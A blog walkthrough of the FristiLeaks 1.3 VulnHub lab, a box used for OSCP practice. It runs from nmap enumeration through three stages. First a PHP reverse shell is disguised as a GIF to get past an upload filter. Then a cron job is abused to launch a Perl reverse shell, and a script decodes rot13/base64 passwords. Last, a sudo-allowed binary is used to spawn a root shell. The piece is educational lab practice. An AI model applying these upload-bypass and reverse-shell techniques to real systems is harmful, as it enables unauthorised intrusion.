Fristileaks 1.3

Vulnhub virtual machine; OSCP prep box, and a very interesting one indeed. This box included a few hints and clues sprinkled around a web application which then pivoted to multiple user escalations along side decryption of cipher-text which led to eventual root.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Initial Setup Note: When booting this VM ensure you virtualization software uses the MAC address 08:00:27:A5:A6:76 I probably spent way more time then I’d like to admit troubleshooting networking issues then I really should have. #fundamentalsofreading

Discover VM on network:

1
netdiscover -r 192.168.56.0/24

Enumeration

Nmap Scan:

1
nmap -sV -sC -oA nmap/fristileaks 192.168.56.109

robots.txt looks to have some interesting directories disallowed

Navigate to webserver:

Not my favorite color but we have a list of user names and a date of 2015.

Users:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
@meneer, 
@barrebas, 
@rikvduijn, 
@wez3forsec, 
@PyroBatNL, 
@0xDUDE, 
@annejanbrouwer, 
@Sander2121, 
Reinierk, 
@DearCharles, 
@miamat, 
MisterXE, 
BasB, 
Dwight, 
Egeltje, 
@pdersjant, 
@tcp130x10, 
@spierenburg, 
@ielmatani, 
@renepieters, 
Mystery guest, 
@EQ_uinix, 
@WhatSecurity, 
@mramsmeets, 
@Ar0xA

Might be helpful in the future.

Source:

First clue, as we are to achieve root and box estimates 4hrs to complete.

Investigate robot.txt disallowed directories http://192.168.56.109/cola

Download locally to investigate for stenography

1
file 3037440.jpg

1
strings 3037440.jpg

Nothing such as .zip or anything is standing out as of now.

Other /sisi/ and /beer/ both contain links to the same image.

Thinking all these directories have some type of drink in the name and we were told to “keep calm and drink fristi” maybe a /fristi/ directory exists.

Navigate to /fristi/

attempt basic logins admin/admin, root/password… etc first.

Met with a whole lot of “wrong username or password”

SQL-injection time

Content filtering is occurring, good job webadmin.

View source:

well hello base64 encoded image.

Decode base64: create file with base64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Decode:

1
cat b64code | base64 --decode

File has a header of PNG. lets pipe this decode into a png file

1
cat b64code | base64 --decode > decode.png

Well this is turning into a bit of a Drake “keke” song. image resolves to keKkeKKeKKeKkEkkEk

Since eezeepz was the one that left the message let try to login

We are in like fine swimwear! and upload file based off php lets try and upload a reverse shell.

attempt to upload shell.php

we will need to disquise our shell as an image.

Made modifications to file name, content-type and added GIF89a;

File filer bypassed and uploaded to /uploads/ directory

Ensure listener is setup

1
nc -lvnp 9000

SHELL/RCE

Launch shell.php.gif

upgrade partial shell to full tty Python method:

1
2
3
4
python -c 'import pty; pty.spawn("/bin/bash")'
press cntl+z 
stty raw -echo
fg (enter)

Priv-Esc

Start the quest to enumerate and elevate privileges on box.

1
uname -a

search for vulnerabilities based off the 2.6.32 kernel

1
searchsploit 2.6.32

looks like we found some priv esc code. — anddddd this has turned out not to be helpful.

Running my enum scripts:

Interesting avenues to take.

Continue Enumerating User Home directories: Found in eezeepz a note.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bash-4.1$ cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did                                                                  
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those                                                                   
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The                                                                 
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

Jerry left this not to add files to /tmp/run that get run as his account.

Lets input a reverse shell into the directory and see if we can elevate our privileges to jerry.

Creating Perl-Reverse-Shell

Made modifications needed.

Setup new listener on 9001

1
nc -lvnp 9001

download script to /tmp

Append the perl script to a new file name runthis

1
echo "/usr/bin/perl /tmp/prs.pl" > runthis

We are now Admin

import new tty

as in our previous encounter the home directory aided in our escalation as to now investigate /home/admin

Interesting files exist here *cryptedpass.txt* , cryptpass.py and whoisyourgodnow.txt.

Cat interesting files:

seems to be encoded in rot13 based off the python script.

Reconstructing the cryptpass.py to decode

1
2
3
4
5
6
7
8
9
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    decode = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(decode)

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

run the scripts

1
2
python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
python cryptpass.py mVGZ3O3omkJLmy2pcuTq

we now have plain-text passwords.

Utilizing password to su to fristigod

quick sudo -l to see what fristi god is capable of doing:

we have a *.secret_admin_stuff/doCom* file which looks very interesting.

Checking the .bash_history

we see a lot of movement pertaining to a user *fristi*

Root

Attempt to run the doCom as fristi user.

1
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

well well….

running doCom as usage indicates but calling /bin/sh

Bring me the Root!

-exec